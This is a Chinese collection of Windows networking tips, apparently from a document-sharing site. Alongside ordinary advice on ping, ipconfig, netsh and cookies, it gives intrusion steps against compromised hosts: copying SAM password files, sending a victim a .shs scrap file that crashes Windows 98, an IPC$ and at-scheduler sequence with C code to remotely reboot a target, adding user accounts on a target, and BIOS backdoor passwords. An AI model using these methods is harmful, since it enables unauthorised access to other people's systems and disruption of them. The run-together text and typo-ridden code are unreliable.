网络大全.docx
《网络大全.docx》由会员分享,可在线阅读,更多相关《网络大全.docx(11页珍藏版)》请在冰豆网上搜索。
网络大全
1)如何查看本机所开端口:
用netstat-a—n命令查看!
再stat下面有一些英文,我来简单说一下这些英文具体都代表什么LISTEN:
侦听来自远方的TCP端口的连接请求SYN-SENT:
再发送连接请求后等待匹配的连接请求SYN-RECEIVED:
再收到和发送一个连接请求后等待对方对连接请求的确认ESTABLISHED:
代表一个打开的连接FIN-WAIT-1:
等待远程TCP连接中断请求,或先前的连接中断请求的确认FIN-WAIT-2:
从远程TCP等待连接中断请求CLOSE-WAIT:
等待从本地用户发来的连接中断请求CLOSING:
等待远程TCP对连接中断的确认LAST-ACK:
等待原来的发向远程TCP的连接中断请求的确认TIME-WAIT:
等待足够的时间以确保远程TCP接收到连接中断请求的确认CLOSED:
没有任何连接状态
2)如何获得一个IP地址的主机名?
利用ping-aip命令查看!
再第一行的pinging后面的『ip』前面的英文就是对方主机名!
同样道理,利用pingmachine_name也可以得到对方的ip获得一个网站的ip地址的方法是:
pingwww.***.com比如想知道sohu的ip,就用pingfrom*.*.*.*:
TTLexpiredintransit的话,呵呵,代表TTL(生命周期)在传输过程中过期什么意思呢?
我来解释一下!
导致这个问题出现的原因有两个:
1)TTL值太小!
TTL值小于你和对方主机之间经过的路由器数目。
2)路由器数量太多,经过路由器的数量大于TTL值!
呵呵,其实这两点是一个意思!
只不过说法不同而已!
3)如何查看本机的ip地址?
用ipconfig来查看就可以!
也可以再Windows
中的开始菜单,运行中输入winipcfg,同样可以看到自己的ipipconfig命令后面如果加一个参数/all的话,可以得到更加详细的资料,比如DNS、网关等……
4)再使用net命令的时候遇到一些错误代码,如何查看对应的错误信息?
用命令nethelpmsgerorr_code来查看就可以了比如错误代码为:
88则查看命令为:
nethelpmsg88下面有这个错误代码的中文显示!
5)利用telnet连接到对方主机上,想获得一些系统信息,用什么命令?
set命令可以很好的完成你所需要收集信息的任务的!
方法:
再cmd下直接输入set(telnet对方主机以后,也是直接set就可以了~然后能够得到NNNNN多的信息)再这里,computername:
呵呵,还用说么?
主机名!
OS=Windows_NT:
操作系统的类型哦~path=C:
\perl\bin\:
(perl的解释器位置!
)systemDrive=c:
操作系统盘符!
USERNAME=coldcrysky当前登陆使用机器的用户……
6)跟踪路由器的命令是什么?
tracert格式:
tracertip中间会列出所有经过的路由器列表!
这些路由器如果是暴露再防火墙外面的话,还可以看到路由的IP哦~呵呵(这里又涉及到了另外一个问题:
为什么要把路由放在防火墙后面?
原因呢,主要有两点:
1)保护路由器!
因为现在越来越多的攻击和入侵已经开始瞄准路由器了~如果直接把路由暴露在外面,呵呵,是非常危险的!
被DoS了就不好了啊~呵
呵,所以要放在防火墙里面;2)为路由器减少负担!
如果所有的过滤功能统统都压在路由器上面,呵呵,路由器的负担就太大了!
)当然,利用pathping也可以达到同样效果!
格式与tracert一样!
7)简单介绍一下cookie!
cookie,又名小甜点。
它的作用:
记录访问者的一些信息。
例如利用cookie记录你所登陆这个网页的次数、登陆时曾经输入的信息……最常见的是,大家再登陆论坛(邮箱)的时候,经常在输入第一个字母的时候,往往下面就显示出了所有在本机登陆过该论坛(邮箱)的用户名吧?
呵呵,这个就是cookie的作用!
大家在Administrator的cookies目录中可以看到很多的记事本文档吧?
这些都是cookie,虽然经过了加密,但是仔细查找的话,仍然能够看到一些敏感信息!
况且现在也已经有了专门查看cookie的软件!
利用这些软件,你的隐私将不保哦~那么,如何清除cookie呢?
一般情况下,可以在Internet选项中的常规选项卡中看到一个删除cookies的按钮,点击就可以清楚掉了~除此以外,还要在internet选项中的内容选项卡中找到自动完成按钮,把里面的四项都选中!
然后点击清除表单,清除密码~然后到操作系统目录所在的分区中!
进入Winnt(98为windows)目录(当然了,这些都是默认的目录!
如果你安装的时候改名了,就对应的去相应目录)之后找到TemporaryInternetFiles目录(2000的目录在c:
\Documentsandsettings\administrator\Localsettings\TemporaryInternetFiles)98直接到windows目录下找TemporaryInternetFiles就可以了~,找到这个文件夹后,打开!
看到里面有NNNNNNNNNNNN多的文件了么?
呵呵,这些是你浏览过
的网页的记录(有的时候从网站上面看到漂亮的FLASH,可是不能保存怎么办?
只要在线浏览一遍以后,断线到这里来找*.swf,之后依次打开查看的话,相信你会找到你所需要的FLASH的!
),好了,跑题了~继续说:
这些文件是网站的页面记录,直接删除就可以了!
另外,有没有彻底禁止cookie的方法呢?
呵呵,当然有了!
在IE的Internet选项中,找到隐私选项卡!
,把里面的滑块拖到最上面,边上写着:
阻止所有cookie,呵呵,是不是?
另外一种方法:
找到Windows目录下的cookies目录!
把里面的txt文件全部删除!
,最后应该只剩下一个index.dat文件!
之后把这个文件夹设置成只读就可以了~不过,禁止cookie后,大部分的论坛都无法正常登陆了啊!
呵呵,到底禁止不禁止就看你自己的了~
8)安装2000的时候,速度会特别特别特别慢,怎么加快安装速度呢?
在DOS上面安装,应该用98启动光盘来引导系统!
然后按照下面的方法来做,可以提高安装速度:
g:
\>cdwindows-------假设G为光驱windows为98的安装目录!
g:
\windows>smartdrv-------加载smartdrv程序!
加载后没有任何提示信息!
只要不返回错误信息就是加载成功了~这时候安装2K的话,速度会很快的哦~
9)Windows2K密码忘记了,如何才能进入系统?
Windows2K的用户配置信息和密码保存在SAM文件里!
该文件位于:
c:
\winnt\system32\config目录中!
只要删除这个文件就可以了~另外,在c:
\winnt\repair目录中也同样有一个SAM文件(这个是前者的备份!
)如果你在登陆肉鸡的时候,copy前面那个目录
中的SAM文件,你会发现COPY不下来!
呵呵,为什么?
因为运行着的2K系统会保护SAM文件啊~这个时候你就COPY这个就可以了!
10)ping不到,tracert不到,但是却能用nbtstat显示对方的一些信息,为什么?
因为tracert和ping命令使用的是ICMP协议!
而nbtstat是通过对方的netbios端口来获得对方的主机信息的!
使用的是UDP和TCP协议!
如果对方仅仅只对ICMP协议做了禁止的话,那通过这个命令获得系统信息是正常的!
11)telnet上去后,如何给对方开共享?
开共享的命令如下:
netsharec=c:
\winnt\system返回共享成功之后直接利用\\ip\c来访问对方的system目录了~删除共享用sharec/del命令就可以了
12)如何判断对方的具体操作系统版本?
首先用ver命令查看对方的版本号!
如果是5.00.2195的话,为2K;5.1.2600为XP从这里可以区分出来到底是2K还是XP了~下面进行更加具体的区分!
2K的pro和svr版本区分:
在telnet下,netshart查看启动的服务~如果对方开启了TerminalServices服务的话,基本上可以判断为svr以上的版本了~如果没有开启,则为pro!
(具体方法有三种,因为前几天在论坛中我回复过暗界了~所以这里就不再重复了~)XP的pro和home版的区分:
homeedition是无法安装iis的!
所以,可以通过iis服务来判断到底是home版或者是pro了~当然了,如果对方是pro,但是将iis删除(停用)的话,就没办法判断了~呵呵
13)如何查看98的随机启动的程序?
在98下有一个实用配置程序(msconfig),中文名为:
系统配置实用程序,调用的方法是在:
开始--运行中
输入msconfig,在里面,有一个启动的选项卡,点击后,可以看到很多随即启动程序,如果前面带有钩的话,就是启动时随机启动的,取消的话就是把前面的小钩去掉就可以了~(如果在这里查看到了一些未知的启动文件--比如没有文件的具体路径,或者没有文件名的话,最好取消它的自启动!
因为很有可能是木马!
)除了这里以外,还有config.sys、autoexec.bat、system.ini、win.ini几个选项卡,他们分别对应这几个文件!
只不过在这里更方便查看而已!
14)设置了BIOS密码,可是却忘记了,该怎么办?
如果是可以进入Windows的话,可以找找biospwds和cmospwd这两个软件看看~还有利用DEBUG法:
简单介绍两种:
1)-o7016-o7113-q2)-o7016-o7116-q另一种方法:
copy法:
copycon输入下面10个字符:
alt+176,alt+17,alt+230,p,alt+176,alt+20,alt+230,q,alt+205,空格,然后按下F6并回车,退出,运行这个程序就可以了~恩,如果不能进入Windows怎么办呢?
简单介绍两种方法:
1)用通用密码:
AwardBios密码:
j256,LKW-PPETER,wantgirl,EBBB,Syxz,AWARD?
SW,AWARD_SW,j262,HLTSER,SKY_FOX,BIOSTAR,ALFARO_ME,lkwpeter,589721,awkard,h996,CONCAT,589589AMIbios密码:
AMI,BIOS,PASSWORD,HEWITTRAND,AMI_SW,LKWPETER,A.M.I.这是常见的密码,不妨试试~如果不行的话,可以利用CMOS放电:
就是把主板上的电池取下来,等一会儿再插上去~
15)如何自制一个让98蓝屏的炸弹?
恩,这个是前几天QQ上面朋友问我的问题,整理的时候突然间想起来了,就写一下好了~首先,打开Word,再插
入菜单中选择对象,这时,弹出对象包装程序窗口,再这个窗口中,点击导入,随便找一个文本或者程序就可以!
之后点:
编辑菜单。
这里选择命令行,出现一个命令行窗口,在里面协商c:
\con\con,点击保存,完成后,再点编辑包中的复制包,把他随便到一个地方复制下来,之后看到的是一个名位片断的东西!
给这个文件起一个名字,呵呵,传给那个可怜的家伙吧,等待他蓝屏,掉线!
(这个命令行中可以插入很多的命令,不见得非要用这个98蓝屏漏洞哦~)顺便说一下:
这个已经不是什么新鲜的技术了,这个技术的名字叫做:
碎片对象。
呵呵,碎片?
记忆碎片么?
不是的!
他的后缀是:
.shs!
之所以说一下这个,是因为有的朋友还不知道~做一个整理而已!
不知道的朋友看过后就知道了,知道的朋友就权当复习了~另外,不要利用这个方法做破坏!
否则后果自负!
16)如何再命令行下杀死对方进程?
利用微软的2K以上操作系统都是含有这个工具的!
该工具包含在2K光盘的\support\tools文件夹下!
里面有安装程序,点击后,就安装了2K的supporttools工具包,里面有kill这个工具,这时候再cmd下可以输入kill/?
,就可以看到帮助了,使用这个命令的格式是:
killpid(pid是进程的ID号!
)再任务管理器中可以看到进程的ID号!
(不知道有几位朋友用过蓝色火焰?
呵呵,用法跟这个一摸一样!
还有很多类似的木马、后门软件都有类似的功能!
这个是windows自带的大木马『后门工具』而已!
)这时候,有朋友问了,那再命令行下如何查看进程呢?
呵呵,这就用到了系统自带的有一个后门工具了:
再刚才说得那个目录中,还有一个工具叫tlist看名字就能看出来是干什么的吧?
用法更简单!
直接输入tlist就可以
得到pid遇队形程序的列表了~那对方机器如果没有安装这两个程序怎么办呢?
没关系,你把你操作系统盘符下面programfiles\supporttools目录下面的这两个对应的exe文件上传到对方的winnt\system32目录中就可以了!
呵呵~
17)上次说了ping的基本用法,这次谈谈ping的命令参数!
这个是本次问题集的重点部分!
无论是小鸟还是老鸟,你们能保证你真的对这些参数了如指掌么?
恐怕都未必!
还是好好看看吧!
这是TCP/IP协议中最有用的命令之一它给另一个系统发送一系列的数据包,该系统本身又发回一个响应,这条实用程序对查找远程主机很有用,它返回的结果表示是否能到达主机,宿主机发送一个返回数据包需要多长时间。
Usage:
ping[-t][-a][-ncount][-lsize][-f][-iTTL][-vTOS][-rcount][-scount][[-jhost-list][-khost-list]][-wtimeout]destination-listOptions:
-tPingthespecifedhostuntilinterrupted.(除非人为中止,否则一直ping下去)-aResolveaddressestohostnames.(把IP转为主机名)-ncountNumberofechorequeststosend.(响应请求的数量)-lsizeSendbuffersize.(封包的大小)-fSetDon`tFragmentflaginpacket.(信息包中无碎片)-iTTLTimeToLive.(时间)-vTOSTypeOfService.(服务类型)-rcountRecordrouteforcounthops.-scountTimestampforcounthops.-jhost-listLoosesourceroutealonghost-list.-khost-listStrictsourceroutealonghost-list.(较严格的……唉,怎么译好……算了,放着吧)-w
timeoutTimeoutinmillisecondstowaitforeachreply.(timeout的时间)比如大家可能都知道的一个命令#ping-f-s65000***.***.***.***或者前阶段大家所谓ping死霉国佬时所用的命令(当然这样只会造成我方自己的网络阻塞)。
其实这个命令主要是用来看对方应答的速度,如果怎么ping得到的结果都是requesttimeout。
那恐怕你根本就不用你去找这台主机了,它不在你的射程之内。
18)如何查看本机的DNS服务器?
ipconfig其实是可以的(呵呵,上次就介绍过这个命令),除此以外,还可以利用一个命令:
再cmd下输入netsh,进入到netsh>提示符,再输入:
intip进入到interfaceip>然后再次输入dump,这时候屏幕上出现当前连接的配置情况了这里必须介绍一下netsh到底是作什么用的!
这个命令比较复杂,他包含了很多的子命令,所以这里只对部分命令进行讲解:
1)查看本机IP:
首先键入netsh,再netsh>提示符下输入:
interface回车之后:
ip回车再之后:
showaddress回车这样,就可以看到当前连接的IP地址和子网掩码。
(其实这个命令不如ipconfig简单,也不如ipconfig/all全面)2)修改网络配置:
接着上面的命令,我们使用:
setaddressname=“本地连接”source=staticaddr=192.168.0.200mask=255.255.255.0,这样就修改了当前的IP地址,用showaddress来看看(或者用ipconfig)3)显示一个完整的网络配置教本:
刚才说过,第一个命令显示的信息不如ipconfig/all全面,不用着急,netsh再打印显示网络配置上,还是有自己的特色的!
例如:
再interfaceip>状态下输入:
dump,会显示一个清单,显示所有本地连接(不
管你是否使用~)与netstat-an不完全一样!
这就是netsh的简单介绍和最基础的用法!
希望大家能够掌握!
还可以输入?
来查看帮助!
(要在netsh>提示符下才能查看帮助啊~)
19)肉鸡上的部分文件无法删除,怎么办?
如果对方的文件夹是只读的话,会出现拒绝访问的字样!
这时候,我们可以再del命令后面加上/f参数来删除!
20)再说一个可以限制用户登陆时间的命令!
再net命令中就可以实现这样的功能!
具体方法如下:
假如我们打算让:
coldcrysky这个用户再周日到周易的上午八点到下午四点之间可以登陆,用这个命令:
netusercoldcrysky/timesunday-monday,08:
00-16:
00之后利用netusercoldcrysky命令来查看登陆时间的限制,可以看到是我们所规定的时间(因为是中文的,很容易懂,我就不多废话了
21)在此,特别提醒各位:
命令中:
星期日才是一周的开始!
!
!
不要当成星期一!
光说了怎么设置,如果想恢复回去怎么办呢?
(就是恢复成默认状态,任何时间都可以登陆的状态)看我的:
netusercoldcrysky/time:
all--这样就可以了~
22)如何删除windows2K的默认贡献?
首先打开记事本,输入如下内容:
netsharec$/deletenetshared$/deletenetsharee$/deletenetsharef$/deletenetshareg$/deletenetshareipc$/deletenetshareadmin$/delete这里的c$、d$、e$……是代表默认共享的盘符~又几个就设置几个就可以了~之后点击保存成批处理文件(后缀为:
bat的文件!
)!
加入到启
动组中就可以了~23)139端口的又一用法呵呵,写这个帖子的原因是因为我答应给一个朋友回复139端口的作用来着……先声明两点:
1)不要利用本帖所提到的方法去搞恶意破坏!
2)呵呵,可能许多人已经知道了139端口这个用法了~本文只想起到一个抛砖引玉的作用!
废话不多说了~开始:
如果你使用NT主机的话,那你可要注意了!
重启NT主机的方法如下:
1:
Netuse\\XXX.XXX.XXX.XXX\ipc$"password"/user:
"username"建立一个IPC连接
2:
netuseH:
\\XXX.XXX.XXX.XXX\C$将对方的C盘映射为自己的h盘
3:
copyconh:
\reboot.batIisreset/rebootCTRL+Z在对方的C盘上生成一个能重启机器的文件
4:
nettime\\XXX.XXX.XXX.XXX得到对方机器时间
5:
at\\XXX.XXX.XXX.XXX重启的时间c:
\reboot.bat设定对方重启的时间!
6:
at\\XXX.XXX.XXX.XXX查看任务上面是否添加了这个任务7:
等对方重启好了~上面的第三步是onlyforWin2K的,如果是Nt,就需要用意个指定的重启程序,我们可以自己编写一个reboot.exe来代替reboot.bat,代码如下:
#include"stdio.h"#include"windows.h"intmain(){文件:
//定义重启的时候发送给所有用户的消息LPSTRmsg="RebootToolByLionHook\n";;文件:
//尝试用最简单的API函数重启
if(ExitWindowXXX(EWX_REBOOT.0))returnTRUE;if(ExitWindowXXX(EWX_REBOOT|EWX_FORCE,0))returnTRUE;文件:
//因为上面的重启不成功,所以需要调整本进程的特权HANDLEhToken;TOKEN_PRIVILEGEStkp;if(!
OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken))returnFALSE;文件:
//获取重启的特权SE_SHUTDOWN_NAMELookupPrivilegevalues(NULL,SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);tkp.PrivilegeCount=1;tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;AdjustTokenPrivileges(hToken,FALSE,&tkp,0,(POTKEN_PRIVILEGES)NULL,0);文件:
//判断是NT内核还是9X内核,选择用不同的方式if(!
GetVersion()&0x80000000))InitiateSystemShutdown(NULL,msg,20,TRUE,TRUE);elseif(!
ExitWindowXXX(EWX_REBOOT,0))if(!
ExitWindowXXX(EWX_REBOOT|EWX_FORCE,0))returnFALSE;returnTRUE;对了,再次说明啊,别用本文提到的方法搞破坏,小心警察叔叔打PP~呵呵
24)利用批处理文件来建立一个记录3389登陆者信息的记录器由于TerminalService默认是没有日志记录的,只能依靠他的系统日志,但是系统日志只能记录一些大动作(开启或停止服务),那么,如何用批处理文件来编写一个将是3389端口的程序呢?
很简单:
建立一个批处理文件:
内容如下:
@echooffdate/t>>c:
\3389log.txt:
TS3389time/t>>c:
\3389log.txtnetstat-an
|find"3389"|find"ESTABLISHED">>c:
\3389log.txtgoto:
TS3389之后保存!
如果有人用你的3389登陆你的机器,呵呵,在c盘下就有3389log.txt这个文件!
记录了当天日志,还有连接时间……资料~开始反击~呵呵
25)网络命令小节A、NET命令:
IPC连接:
格式netuse\\对方IP\ipc$"密码"user:
"用户名"『建立IPC连接~』netuse\\对方IP\ipc$/delete『断开连接~』以下操作需要在连接到对方主机后才可进行!
!
!
netusercoldcryskyxyz/add『在连接的目标主机中加入一个用户名为COLDCRY
升级会员 